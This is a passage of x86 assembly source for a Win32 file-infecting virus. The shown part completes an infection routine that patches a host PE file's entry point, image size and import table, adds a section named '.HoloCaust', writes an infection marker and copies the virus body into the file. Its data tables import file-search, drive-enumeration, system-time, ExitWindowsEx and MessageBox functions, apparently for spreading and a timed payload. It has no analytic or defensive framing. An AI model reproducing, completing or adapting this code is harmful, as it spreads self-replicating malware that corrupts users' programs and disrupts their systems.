call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[Infected_AddressOfEnterPoint-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
mov eax,[SizeOfImage-Virus_Code+ebp]
add eax,1000h
mov [Infected_SizeOfImage-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_SizeOfImage-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 2
lea eax,[Infected_SizeOfImage-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
mov eax,[Infected_AddressOfEnterPoint-Virus_Code+ebp]
add eax,New_Imoprt_Descridtor-Virus_Code
mov [Infected_ImportTable-Virus_Code+ebp],eax
push FILE_BEGIN
push 0
push dword ptr [Point_ImportTable-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 4
lea eax,[Infected_ImportTable-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
push FILE_BEGIN
push 0
push dword ptr [Point_AEmptySectionTable-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 40
lea eax,[VirusSectionTable-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
mov eax,[NT_Header-Virus_Code+ebp]
sub eax,1
push FILE_BEGIN
push 0
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 1
lea eax,[Mark-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
push FILE_BEGIN
push 0
push dword ptr [PointerToRawData-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [SetFilePointer-Virus_Code+ebp]
push NULL
lea eax,[DoWriteOrRead-Virus_Code+ebp]
push eax
push 1000h
lea eax,[Virus_Code-Virus_Code+ebp]
push eax
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [WriteFile-Virus_Code+ebp]
push dword ptr [HandleFile-Virus_Code+ebp]
call dword ptr [CloseHandle-Virus_Code+ebp]
mov eax,012345678h
here
InfectFile_Exit:
RET
Infect_File endp
HandleFiledd ?
DoWriteOrReaddd ?
Markdb 49h
Infected_NumberOfSectiondw ?
Infected_AddressOfEnterPointdd ?
Infected_SizeOfImagedd ?
Infected_ImportTabledd ?
NT_Header dd ?
PE_Signaturedd ?
Point_NumberOfSectiondd ?
NumberOfSectiondw ?
Point_SizeOfOptionalHeaderdd ?
SizeOfOptionalHeaderdw ?
Point_AddressOfEnterPointdd ?
AddressOfEnterPointdd 01000h
Point_ImageBasedd ?
ImageBase dd 0400000h
Point_SizeOfImage dd ?
SizeOfImage dd ?
Point_FileOffsetImportTabledd ?
Point_ImportTable dd ?
ImportTable dd ?
Point_AEmptySectionTable dd ?
VirusSectionTable=$
NameSection db ".HoloCaust"
SVirtualSizedd 01000h
SVirtualAddressdd ?
SizeOfRawDatadd 01000h
PointerToRawData dd ?
PointToRelocationsdd 0
PointerToLinenumbersdd 0
NumberOfRelocationsdw 0
numberOfLinenumbwrsdw 0
SFlagsdd 060000020h+80000000h
S_CreateFileA db 0,0,"CreateFileA",0
S_SetFilePointer db 0,0,"SetFilePointer",0
S_ExitProcess db 0,0,"ExitProcess",0
S_ReadFile db 0,0,"ReadFile",0
S_CloseHandle db 0,0,"CloseHandle",0
S_WriteFile db 0,0,"WriteFile",0
S_SetFileAttributesA db 0,0,"SetFileAttributesA",0
S_FindFirstFileA db 0,0,"FindFirstFileA",0
S_FindNextFileA db 0,0,"FindNextFileA",0
S_GetSystemTimedb 0,0,"GetSystemTime",0
S_GetLogicalDrivesdb 0,0,"GetLogicalDrives",0
S_ExitWindowsExdb 0,0,"ExitWindowsEx",0
S_MessageBoxA db 0,0,"MessageBoxA",0
KERNEL32_DLLName db "KERNEL32.dll",0
USER32_DLLNamedb "USER32.DLL",0
KERNEL32_API_Entry=$
CreateFileA dd ?
SetFilePointer dd ?
ExitProcess dd ?
ReadFile dd ?
CloseHandle dd ?
WriteFile dd ?
SetFileAttributesAdd ?
FindFirstFileAdd ?
FindNextFileAdd ?
GetSystemTimedd ?
GetLogicalDrives dd ?
USER32_API_Entry=$
ExitWindowsExdd ?
MessageBoxA dd ?
Fix_Data=$
Fix_CreateFileAdd S_CreateFileA -Virus_Code
Fix_SetFilePointerdd S_SetFilePointer-Virus_Code
Fix_ExitProcessdd S_ExitProcess -Virus_Code
Fix_ReadFiledd S_ReadFile-Virus_Code
Fix_CloseHandledd S_CloseHandle -Virus_Code
Fix_WriteFile dd S_WriteFile-Virus_Code
Fix_SetFileAttributesAdd S_SetFileAttributesA-Virus_Code
Fix_FindFirstFileAdd S_FindFirstFileA-Virus_Code
Fix_FindNextFileA dd S_FindNextFileA-Virus_Code
Fix_GetSystemTime dd S_GetSystemTime-Virus_Code
Fix_GetLogicalDrivesdd S_GetLogicalDrives-Virus_Code
dd 0
Fix_ExitWindowsEx dd S_ExitWindowsEx-Virus_Code
Fix_MessageBoxAdd S_MessageBoxA -Virus_Code
dd 0
Fix_KERNEL32_OriginalFirstThunk dd KERNEL32_Original_API_Name_Point-Virus_Code
Fix_KERNEL32_TimeDateStamp dd ?
Fix_KERNEL32_ForwarderChain dd ?
Fix_KERNEL32_Name1 dd KERNEL32_DLLName-Virus_Code
Fix_KERNEL32_FirstThunk dd KERNEL32_API_Entry-Virus_Code
Fix_USER32_OriginalFirstThunk dd USER32_Original_API_Name_Point-Virus_Code
Fix_USER32_TimeDateStamp dd ?
Fix_USER32_ForwarderChain dd ?
Fix_USER32_Name1 dd USER32_DLLName-Virus_Code
Fix_USER32_FirstThunk dd USER32_API_Entry-Virus_Code
Move_Data=$
KERNEL32_Original_API_Name_Point=$
Original_CreateFileAdd S_CreateFileA -Virus_Code+4000h
Original_SetFilePointer dd S_SetFilePointer-Virus_Code+4000h
Original_ExitProcessdd S_ExitProcess -Virus_Code+4000h
Original_ReadFile dd S_ReadFile-Virus_Code+4000h
Original_CloseHandledd S_CloseHandle -Virus_Code+4000h
Original_WriteFile dd S_WriteFile-Virus_Code+4000h
Original_SetFileAttributesAdd S_SetFileAttributesA-Virus_Code+4000h
Original_FindFirstFileAdd S_FindFirstFileA-Virus_Code+4000h
Original_FindNextFileAdd S_FindNextFileA-Virus_Code+4000h
Original_GetSystemTimedd S_GetSystemTime-Virus_Code+4000h
Original_GetLogicalDrivesdd S_GetLogicalDrives-Virus_Code+4000h
Zero_KERNEL32dd 0
USER32_Original_API_Name_Point=$
Original_ExitWindowsExdd S_ExitWindowsEx-Virus_Code+4000h
Original_MessageBoxAdd S_MessageBoxA -Virus_Code+4000h
Zero_USER32 dd 0
New_Imoprt_Descridtor=$
;KERNEL32.dll
KERNEL32_OriginalFirstThunk dd KERNEL32_Original_API_Name_Point-Virus_Code+4000h
KERNEL32_TimeDateStamp dd ?
KERNEL32_ForwarderChain dd ?
KERNEL32_Name1 dd KERNEL32_DLLName-Virus_Code+4000h
KERNEL32_FirstThunk dd KERNEL32_API_Entry-Virus_Code+4000h
;USER32.DLL
USER32_OriginalFirstThunk dd USER32_Original_API_Name_Point-Virus_Code+4000h
USER32_TimeDateStamp dd ?
USER32_ForwarderChain dd ?
USER32_Name1 dd USER32_DLLName-Virus_Code+4000h
USER32_FirstThunk dd USER32_API_Entry-Virus_Code+4000h
HostImportData=$
dd 0204ch,0,0,0206ah,02000h
dd 02054h,0,0,02086h,02008h
dd 5 dup(0)
Virus_WIN32_FIND_DATA=$
dwFileAttributes dd 0
ftCreationTime dd 0,0
ftLastAccessTime dd 0,0
ftLastWriteTime dd 0,0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 260 dup(0)
cAlternate db 14 dup(0)
SystemTime=$
wYear dw ?
wMonth dw ?
wDayOfWeek dw ?
wDay dw ?
wHour dw ?
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
CODE ENDS
END Start